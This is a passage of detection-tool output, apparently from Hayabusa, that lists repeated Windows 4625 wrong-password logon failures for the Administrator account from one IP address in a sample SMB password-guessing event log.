NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4BI6V35tZGZ1WGtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wOF75n4aunKH9qxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jsTFTCnFFBkhG5jP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5qiwcKE2TQui2H8z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PZOCyXplWOCyKbFm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RhyaAhYB78nbh1Ig | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MIJU9xbr1klIvvdE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qLKVR3mW3g3utO4X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNm4tVG8bV7e9gbB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JtU0PCr9K5DXFYV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: 